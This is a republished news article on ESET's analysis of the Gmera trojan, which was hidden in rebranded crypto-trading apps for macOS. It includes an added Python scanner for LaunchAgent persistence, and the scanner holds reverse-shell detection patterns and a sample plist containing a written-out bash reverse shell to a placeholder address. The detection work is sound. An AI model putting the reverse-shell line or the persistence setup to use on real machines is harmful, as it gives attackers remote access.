Mac users trying to trade cryptocurrencies targeted by Gmera Trojan operators

July 19, 2020
in Internet Security

Apple macOS users are being targeted in a fresh campaign aiming to pilfer cryptocurrency from their wallets.

Trojanized cryptocurrency trading applications built for Apple's operating system have been spotted recently by ESET researchers, who detailed their findings in a blog post on Thursday.

The Trojanized applications are being offered online as versions of legitimate trading software, such as the desktop terminal app developed by Kattana for cryptocurrency trading.

ESET has not established the exact infection vector, but social engineering appears to be in play, especially given Kattana's warning in March that users were being approached directly and urged to download malware-laden apps. Copycat websites posing as Kattana have also been spotted.

“The hypothesis of the operators directly contacting their targets and socially engineering them into installing the malicious application seems the most plausible,” the researchers say. 

Four rebranded versions of the legitimate Kattana app have been tracked so far, named Cointrazer, Cupatrade, Licatrade, and Trezarus. Each still works as a trading terminal, but each also ships with a Gmera installer bundled inside the software.

Researchers from Trend Micro published an analysis of Gmera back in 2019. The malware was previously found bundled in another Mac trading app called Stockfolio.

Upon execution, Gmera first contacts a command-and-control (C2) server over HTTP, then opens remote terminal sessions to a second C2 server at a hardcoded IP address.

Using the Licatrade sample as the basis for its analysis (the rebranded variants differ only slightly), ESET found that the bundled installer first runs a shell script that opens the C2 connection and installs a Launch Agent to maintain persistence.

In Licatrade, however, the Launch Agent is broken: it was meant to re-open a reverse shell from the victim's machine to an attacker-controlled server, but it fails to do so. In the other Trojanized variants the persistence mechanism works as intended.
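The check an incident responder would run against the persistence mechanism just described, as an added example that is not ESET's analysis tooling and not code from the Gmera samples: it parses LaunchAgent property lists with the Python standard library and flags any that hand a shell a reverse-shell one-liner or call back to a hardcoded IP address. The two embedded plists are constructed samples; their labels, paths, address and port are assumptions, not indicators from this campaign.

```python
"""Flag reverse-shell-style persistence in macOS LaunchAgent plists.

Added illustration, not code from ESET's report or from the Gmera samples.
Only the standard library is used, so it runs anywhere; on a Mac the main
block also walks the real LaunchAgents directories.
"""
import plistlib
import re
from pathlib import Path
from xml.parsers.expat import ExpatError

# Generic reverse-shell heuristics (an assumed list, not Gmera-specific IoCs).
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),                          # bash TCP redirection
    re.compile(r"\bnc\b.*\s-e\s"),                     # netcat -e <program>
    re.compile(r"\b(bash|sh|zsh)\s+-i\b"),             # inline interactive shell
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),  # download-and-execute
    re.compile(r"\bpython[23]?\s+-c\b.*\bsocket\b"),   # python one-liner shell
]
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHELLS = {"sh", "bash", "zsh"}


def analyse_agent(plist_bytes: bytes) -> dict:
    """Return a verdict for one LaunchAgent given its raw plist bytes."""
    try:
        data = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ExpatError):
        # An unparseable file sitting in LaunchAgents is itself worth a look.
        return {"label": "<invalid plist>", "command": "", "suspicious": True,
                "reasons": ["invalid plist"], "persistence": []}
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    cmdline = " ".join(str(a) for a in args)
    reasons = []
    # A shell run with "-c <one-liner>" is the usual way to launch a callback.
    if args and Path(args[0]).name in SHELLS and "-c" in args:
        reasons.append("shell -c one-liner")
    for pat in REVERSE_SHELL_PATTERNS:
        if pat.search(cmdline):
            reasons.append(f"reverse-shell pattern {pat.pattern!r}")
    if IPV4.search(cmdline):
        reasons.append("hardcoded IPv4 address")
    # Persistence knobs: start at login and respawn whenever the process dies.
    persistence = [k for k in ("RunAtLoad", "KeepAlive") if data.get(k)]
    return {
        "label": data.get("Label", "<no label>"),
        "command": cmdline,
        "suspicious": bool(reasons),
        "reasons": reasons,
        "persistence": persistence,
    }


def scan_launch_agents(directory: Path) -> list:
    """Analyse every .plist in a LaunchAgents directory (per-user or system-wide)."""
    return [analyse_agent(p.read_bytes()) for p in sorted(directory.glob("*.plist"))]


# Constructed samples. The second is modelled on the behaviour described in the
# article: a shell one-liner calling back to a hardcoded address, re-run at every
# login. Label, address and port are made up (192.0.2.0/24 is a documentation range).
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

REVERSE_SHELL_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>bash -i &gt;&amp; /dev/tcp/192.0.2.10/8443 0&gt;&amp;1</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""


if __name__ == "__main__":
    for sample in (BENIGN_AGENT, REVERSE_SHELL_AGENT):
        print(analyse_agent(sample))
    for agents_dir in (Path.home() / "Library" / "LaunchAgents", Path("/Library/LaunchAgents")):
        if agents_dir.is_dir():
            for verdict in scan_launch_agents(agents_dir):
                if verdict["suspicious"]:
                    print("SUSPICIOUS:", verdict)
```

The heuristics are deliberately coarse: a benign agent that runs a plain binary produces no findings, while anything that routes through `sh -c`, touches `/dev/tcp/`, or embeds a raw IP is surfaced together with its RunAtLoad/KeepAlive settings so the responder can see both what the agent runs and how it survives a reboot.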

Much of the legitimate Kattana terminal was left intact, including the login mechanism the app requires to link wallets for trading, a feature the fraudsters can abuse to reach victims' wallets.

In the reconnaissance stage, the malware collects machine details and lists the available Wi-Fi networks, since honeypots and analysis sandboxes are likely to have Wi-Fi disabled. Gmera also checks whether it is running inside a virtual machine, records the macOS version, and takes a screenshot of the desktop.

The operators intended to skip the screenshot on Catalina, where the user must explicitly approve screen recording and the attempt would therefore trigger a conspicuous permission prompt. A bug in the malware's version check, however, means the screenshot is taken regardless of the OS.

“It is interesting to note how the malware operation is more limited on the most recent version of macOS,” ESET added. “We did not see the operators try to circumvent the limitation surrounding screen captures. Further, we believe that the only way that they could see the computer screen on victim machines running Catalina would be to exfiltrate existing screenshots taken by the victim.”

The data theft then begins. Reverse shells are used to exfiltrate browser cookies, browsing histories, and cryptocurrency wallet credentials. 

The code-signing certificate used on this sample was issued by Apple to "Andrey Novoselov" on April 6, 2020. Apple revoked it on May 28 after being made aware of the abuse.

Each campaign traced by ESET used a different Apple-issued code-signing certificate, all of which have since been revoked.

“In the case of Cointrazer, there were only 15 minutes between the moment the certificate was issued by Apple and the malefactors signing their Trojanized application,” the researchers say. “This, and the fact that we didn’t find anything else signed with the same key, suggests they got the certificate explicitly for that purpose.”

Credit:
Zdnet